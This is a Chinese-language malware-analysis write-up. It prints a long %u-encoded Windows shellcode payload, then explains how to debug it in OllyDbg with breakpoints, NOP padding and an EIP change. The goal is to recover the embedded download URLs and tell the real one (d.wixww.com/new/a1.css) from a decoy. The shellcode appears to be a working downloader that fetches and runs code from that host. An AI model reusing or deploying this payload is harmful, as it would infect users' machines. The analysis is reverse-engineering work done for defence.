%xu7474%xuF974%xu14D4%xu8B8B%xu9C8B%xu7743%xu7474%xuAF47%xu2727%xu2727%xuA48B%xu4CF4%xuF49C%xu9D4C%xu7B01%xu0CF5%xuE471%xuE4E4%xu00E4%xu2172%xu98FF%xu34F9%xu8B71%xu9C94%xu8B5A%xu8B8B%xu9CB7%xu8B5C%xu8B8B%xu65CC%xu7075%xuB6F4%xu7478%xu6F9C%xu8B8B%xu478B%xu24B4%xu9C20%xu7420%xu7474%xu9C24%xu76FF%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu7635%xu7474%xu8B47%xu8B23%xu9CA4%xu758F%xu7474%xu8B1C%xu7474%xu8B74%xu9CA4%xu8A9C%xu8B8B%xu2327%xu4722%xu24B4%xu9C20%xu746A%xu7474%xu9C24%xu7621%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu767F%xu7474%xu8B47%xu8B23%xu2CA4%xu2B2A%xuB72F%xu769F%xuB72C%xu8D9C%xu8B8B%xu228B%xuF723%xu7C98%xu88FF%xu7C1E%xu4A23%xu038B%xu9C60%xu7629%xu7474%xuA48B%xu88FF%xu151C%xu1119%xu1C74%xu313D%xu0632%xu80FF%xu7CCD%xu7474%xu8774%xu01D2%xu1E5B%xu4A74%xu008B%xu5450%xu509C%xu7476%xu8B74%xuFFA4%xu9C8C%xu75BF%xu7474%xuA48B%xu8C4F%xu7C00%xuFF42%xu5030%xu4A54%xu748B%xu8B4A%xu5000%xu9C68%xu759B%xu7474%xuA48B%xuB0F7%xu2B64%xuCC2A%xu7475%xu7474%xu1CB7%xu1A1B%xu7474%xu011C%xu1806%xu9F19%xuF961%xu5030%xu2470%xu569C%xu8B8A%xu248B%xu3E9C%xu7476%xu9D74%xu8A96%xu8B8B%xu929C%xu8B8B%xuF78B%xu7CB0%xu1EB7%xu1C18%xu001A%xu1810%xu619F%xu30F9%xu7050%xu9C24%xu898F%xu8B8B%xu9C24%xu7657%xu7474%xuCF9D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu471C%xu7446%xu1C74%xu0701%xu0611%xu619F%xu30F9%xu7050%xu9C24%xu89A5%xu8B8B%xu9C24%xu758D%xu7474%xuE59D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu171C%xu0302%xu1C74%xu1C07%xu1B10%xu619F%xu30F9%xu7050%xu9C24%xu89D3%xu8B8B%xu9C24%xu75BB%xu7474%xu139D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu021C%xu0C13%xu9F74%xuF961%xu5030%xu2470%xuF69C%xu8B89%xu248B%xuDE9C%xu7475%xu9D74%xu8A36%xu8B8B%xu929C%xu8B8B%xuF78B%xu70B0%xu9CB7%xu75DF%xu7474%xu6F1C%xu32B2%xu240D%xuB29C%xu7475%xuF774%xu7CB0%xu9CB7%xu75E3%xu7474%xu981C%xu77E3%xu2478%xuC69C%xu7475%xuF774%xu7CB0%xu9CB7%xu75F7%xu7474%xuDE1C%xu7988%xu2408%xuEA9C%xu7475%xuF774%xu7CB0%xu9CB7%xu751B%xu7474%xu991C%xu9B22%xu2442%xuFE9C%xu7475%xuF774%xu7CB0%xu9CB7%xu752F%xu7474%xu841C%xu70FE%xu242B%xu029C%xu7475%xuF774%xu7CB0%xu9CB7%xu8A83%xu8B8B%xu0C1C%xuAF1C%xu2468%xu169C%xu7475%xuF774%xu7CB0%xu9CB7%xu7547%xu7474%xu9B1C%xu94BA%xu2414%xu3A9C%xu7475%xuF774%xu7CB0%xu9CB7%xu756B%xu7474%xuC41C%xu593D%xu24AF%xu4E9C%xu7475%xuF774%xu7CB0%xu9CB7%xu8B42%xu8B8B%xuDF1C%xuEF2A%xu246A%xu529C%xu7475%xuF774%xu7CB0%xu9CB7%xu8AD3%xu8B8B%xu2D1C%xuF5E3%xu2476%xu669C%xu7475%xuF774%xu7CB0%xu9CB7%xu7497%xu7474%xu0A1C%xu96AC%xu2407%xu8A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu74BB%xu7474%xuEA1C%xuCF8D%xu2441%xu9E9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8AE6%xu8B8B%xu231C%xuC1D4%xu24CF%xuA29C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A0A%xu8B8B%xu6E1C%xu6A0E%xu2476%xuB69C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A1E%xu8B8B%xu941C%xu442F%xu24E0%xuDA9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A22%xu8B8B%xuE31C%xu96BD%xu24D7%xuEE9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A36%xu8B8B%xu1C1C%xuB150%xu24C7%xuF29C%xu7474%xuF774%xu7CB0%xu9CB7%xu7423%xu7474%xu061C%xuC78A%xu2462%xu069C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A30%xu8B8B%xu679F%xu111E%xu9C24%xu8F83%xu8B8B%xu9C24%xu8ADF%xu8B8B%xuC39D%xu8B88%xu9C8B%xu8B9C%xu8B8B%xu9CB7%xu89DD%xu8B8B%xu3B1C%xu3B9B%xu2471%xu4A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu747B%xu7474%xuFA1C%xu7A3A%xu2498%xu5E9C%xu7474%xuF774%xu7CB0%xu47B7%xu10B4%xu34FF%xuF144%xu0CB4%xu4A64%xu34FF%xu4A78%xu04FF%xuD968%xuFF4A%xu7C34%xu9FB7%xu4A7F%xu34FF%xuF740%xu08B4%xuFF4A%xu4834%xu14B7%xuFF42%xu5018%xu4250%xu31FF%xu4248%xu20FF%xu0C71%xuA177%xuFF4A%xu6C3E%xuFF4A%xu542E%xuA977%xu4F97%xu4A3D%xu40FF%xu77FF%xu4781%xu478B%xu88B4%xuF0D8%xu00B4%xuB573%xu79BB%xu8C77%xu809F%xu4F42%xu5008%xu015C%xu4AAB%xu2EFF%xu7750%xu12A9%xuFF4A%xu3F78%xuFF4A%xu682E%xuA977%xuFF4A%xuFF70%xuB177%xuFD42%xu5030%xu1568%xu9CB7%xu8F12%xu8B8B%xu001C%xu0400%xu5B4E%xu105B%xu035A%xu0C1D%xu0303%xu175A%xu191B%xu1A5B%xu0311%xu155B%xu5A45%xu0717%xu7407%xu7474%xu7474%xu7474%xu7474%xu1C74%xu0000%xu4E04%xu5B5B%xu0303%xu5A03%xu1516%xu101D%xu5A01%xu1B17%xu5B19%xu1100%xu0007%xu115A%xu110C%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu0021  

虽然只是加了两个%xu9090(在汇编中就是4个NOP),但是却至关重要

照例在下面这里下一个断点:

0040501E  ^\E2 FA           loopd   short 0040501A

是不是会发现,没有出现异常了?

但是,到下面这里时

00405038    F3:A4           rep     movs byte ptr es:[edi], byte ptr>

仍然进入异常…估计是代码本身的问题,忘高手解答..

其实到这里时,你已经可以从内存读地址了

但是..你会发现有两个地址..

1、hxxp://d.wixww.com/new/a1.css

2、hxxp://www.baidu.com/test.exe

当然…第二个明显是假的…

外一这个Shellcode真的是从第二个那里下载的呢(比如说生成Shellcode的那家伙脑残了)

因此为了确认哪个是真实地址..还得OD调试..

有人会说…既然已经异常了..那么从何知道哪个是真实的?

其实很简单

修改EIP到这里

00405083   /EB 58           jmp     short 004050DD

然后跟一下下..

到下面时..

004050E2    5B              pop     ebx                             

从堆栈中就可以看到

堆栈 [0013FFD0]=0040557C (MyOutPut.0040557C), ASCII "http://d.wixww.com/new/a1.css"
ebx=0000001C

那么就证实了…第二个地址的确是假的…

特辑完….